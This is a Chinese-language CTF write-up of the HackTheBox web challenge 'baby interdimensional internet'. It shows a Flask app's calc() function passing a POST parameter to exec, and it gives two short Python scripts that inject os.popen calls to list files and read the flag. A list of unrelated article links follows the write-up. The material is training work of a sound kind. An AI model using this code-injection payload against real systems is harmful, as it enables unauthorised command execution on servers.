文章目录

  • 概述
  • 题目
    • 源代码分析
    • 测试
    • 利用代码

概述

HackTheBox 网站CTF靶场Web相关题目baby interdimensional internet,题目地址https://app.hackthebox.eu/challenges/baby-interdimensional-internet,主要考察Flask源代码审计和远程命令执行相关知识点。

题目

题目提示为calculator

开启程序实例后,提示访问46.101.23.188:31501

访问http://46.101.23.188:31501/,查看源代码,发现/debug路径

访问http://46.101.23.188:31501/debug,发现源代码,为Flask

源代码分析

分析程序,可以通过POST方法传入ingredientmeasurements两个参数,交由calc()处理,和题目提示的calculator有联系,查看calc()的代码,发现其调用了exec

测试

先正常传入ingredientmeasurements两个参数

发现measurements回显在响应页面。

利用代码

编写利用代码,执行ls命令,发现flag文件

#!/usr/bin/python3 import requests data = {'ingredient': 'our_var', 'measurements': '__import__("os").popen("ls").read()'}
addr = 'http://46.101.23.188:31501'
r = requests.post(addr, data=data)print(r.content)

修改利用代码,读取flag文件,得到flag的值

#!/usr/bin/python3 import requests data = {'ingredient': 'our_var', 'measurements': '__import__("os").popen("cat flag").read()'}
addr = 'http://46.101.23.188:31501'
r = requests.post(addr, data=data)print(r.content)

HackTheBox-baby interdimensional internet相关推荐

  1. Hackthebox:Arctic Walkthrough

    预备知识 使用了msfvenom,不想看的可以跳过 浏览器信息收集尤其是细节发现服务信息不能过度依赖工具 MS10-059.smbserver.jsp reverse shell 信息收集和获取立足点 ...

  2. vs2008与IIS 7.0使用在vista上时出现的问题及解决方法(Internet Explorer 无法显示该页面)(VS2008: IE Cannot Display Web Page)...

    我的系统是Vista Ultimate SP1,先安装了vs2008 ,然后再安装了IIS7.0之后就出现了一系列的问题. 问题:通过vs2008启动程序调试时报错.错误提示为:Internet Ex ...

  3. 响应因特网端口ping命令_如何使用Ping命令识别基本的Internet问题

    响应因特网端口ping命令 Next time you call your help desk, do you want to wow them with your networking knowle ...

  4. Windows Server 2008 禁用Internet Explorer 增强的安全配置

    1.1.1 任务3:禁用Internet Explorer 增强的安全配置 Internet Explorer 增强的安全配置 (IE ESC) 采用一种方式配置您的服务器和 Microsoft In ...

  5. 【转】“无法在Web服务器上启动调试。您不具备调试此应用程序的权限,此项目的URL位于Internet区域”错误提示的解决...

    错误提示: 无法在Web服务器上启动调试.您不具备调试此应用程序的权限,此项目的URL位于Internet区域 一般用下面的方法可以解决: 1:确认在"配置属性"中的"启 ...

  6. R语言使用download.file函数下载网络文件到本地(Download File from the Internet)

    R语言使用download.file函数下载网络文件到本地(Download File from the Internet) 目录 R语言使用download.file函数下载网络文件到本地(Down ...

  7. OSError: Unable to download 'ffmpeg.win32.exe'. Perhaps there is a no internet connection? If there

    OSError: Unable to download 'ffmpeg.win32.exe'. Perhaps there is a no internet connection? If there ...

  8. win10系统的qq无网络连接网络连接到服务器,Win10系统下误报无法连接internet该怎么办?新手速看...

    在日常的工作以及学习当中,电脑已经成为我们身边最亲密的好帮手了,它不但可以帮助我们解决日常的诸多事物,而且还能够让我们足不出户就知晓天下事.当然了,那是必须在电脑连接了internet的前提下.而在电 ...

  9. Connectify错误“Internet Connection Sharing is currently unavailable.”解决方法不要有多重的网桥连接

    1.在"控制面板"--"服务"中确保"Internet Connection Sharing"启动 2.不要有多重的网桥连接 3.在&quo ...

最新文章

  1. 多模态数据+知识图谱,这次你的疑难杂症有解了!
  2. 台湾高校首创气体灭火数位实境教育馆
  3. 互联网产品策划经验总结(用户端产品)
  4. c++学习笔记之类模板
  5. Sparkmllib scala svm demo
  6. Python学习笔记 setdict
  7. MQTT与函数计算做热力图实践
  8. .NET Core快速入门教程 2、我的第一个.NET Core App(Windows篇)
  9. Java调用百度OCR文字识别的接口
  10. BugkuCTF-Crypto题affine
  11. 理想汽车致歉并宣布召回10469台车,官方:不影响后续生产和销售
  12. npm vue安装教程
  13. Java学习笔记1---JVM、JRE、JDK
  14. python第三十一课--递归(3.递归的弊端)
  15. 29. Element ownerDocument 属性
  16. python垃圾邮件识别_Python之机器学习-朴素贝叶斯(垃圾邮件分类)
  17. 传统企业如何开启O2O营销模式?
  18. java版我的世界MITE怎么下_我的世界mite振金版
  19. 汇新云智慧城市解决方案——以区块链加速智慧城市建设
  20. 教你如何写初/高级前端简历【全新web前端入门视频教程】

热门文章

  1. Python中的布尔类型
  2. Jmeter+Jenkins+Ant接口自动化测试平台搭建(Mac)(一)
  3. windows安装matplotlib方法(cmd+pycharm)+cmd不运行python命令解决方法
  4. 项目管理中,如何对各种文件进行统一版本管理?
  5. 计算机专业英语的特点 1,计算机专业英语的的一些特点.doc
  6. 腾讯AI在星际2完整对战中击败“作弊级”内建Bot
  7. 穿(string类的运用)
  8. 在 PostgreSQL 中简单实现 Insert ignore 操作
  9. powershell使用总结
  10. 163邮箱哪个安全好用?常用的电子邮箱品牌有哪些?